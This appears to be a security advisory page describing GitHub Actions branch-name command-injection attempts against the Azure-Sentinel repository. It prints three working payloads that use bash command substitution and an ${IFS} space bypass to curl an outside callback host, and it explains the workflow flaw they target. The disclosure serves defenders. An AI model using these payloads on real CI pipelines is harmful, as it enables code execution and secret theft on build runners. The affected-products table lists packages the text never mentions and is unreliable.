VDB

GCVE-110-OSM-2026-596

GCVE-110-OSM-2026-596
Advisory PublishedCVSS 8.8/10
Vulnetix · Advisory published May 21, 2026
GitHub user account used to launch GitHub Actions branch-name command-injection attacks against Azure/Azure-Sentinel. On 2026-05-21 the account opened PRs #14319, #14320, and #14321 whose branch names contained working shell payloads using bash command substitution with IFS as a space-bypass, and immediately triggered the /package ChatOps workflow on each PR via comment. Branches and PRs were closed/deleted within minutes (evidence cleanup). Account is fresh (created 2025-08-22), empty profile, 0 followers, only forks of Microsoft/GitHub repos (codespaces, AL-Go-PTE, semantic-kernel, vscode-copilot-chat) which is a typical GHA-injection reconnaissance footprint across the Microsoft estate. The payload in PR #14320 referenced an MSRC case path (msrc-77210699778-xQ7vN2) which suggests possible bug-bounty research, but the public artifacts are weaponized PoCs against a Microsoft security product CI either way. Malicious payload found in: PR head_ref (branch name) on Azure/Azure-Sentinel === PAYLOAD 1: PR #14319 === Branch (dollar/IFS chars escaped): a$(curl${IFS}ky28nlq70u99.dssldrf.net/helloworld) Commit: 84352946096fa7e61764a0dcce1e98bafa25c5e7 Trigger: /package comment by wolf-dragoon @ 2026-05-21 15:36:33 UTC === PAYLOAD 2: PR #14320 === Branch: c$(curl${IFS}ky28nlq70u99.dssldrf.net/msrc-77210699778-xQ7vN2) Commit: 49c7e683f18aa945f61514c95da96ca0974abaa5 Trigger: /package comment by wolf-dragoon @ 2026-05-21 15:55:58 UTC Note: msrc-77210699778 path suggests MSRC bug-bounty submission tracking === PAYLOAD 3: PR #14321 === Branch: b$(curl${IFS}pkg-cmd-1.ky28nlq70u99.dssldrf.net) Commit: d84920218a405209a1b92ec0e35d262b98d09597 Trigger: /package comment by wolf-dragoon @ 2026-05-21 16:01:13 UTC C2/OAST host: ky28nlq70u99.dssldrf.net (apex: dssldrf.net) Mechanism: If a workflow interpolates github.head_ref or pull_request.head.ref into a shell run: step (likely the handler for /package ChatOps trigger in pull_request_target context), the curl payload executes on a Microsoft-controlled runner with whatever secrets that workflow holds.

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
8.8/10
High · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknownnemo-fpti* (affected), all (affected), all (affected), all (affected), * (affected), all (affected), all (affected), all (affected), * (affected)
unknownexpress-session-validatorall (affected), all (affected), all (affected), all (affected)
unknown* (affected), all (affected)
unknownagoda-test-pocall (affected), all (affected)

Browse GCVE Records

72,664 records in the GCVE database · Updated July 15, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›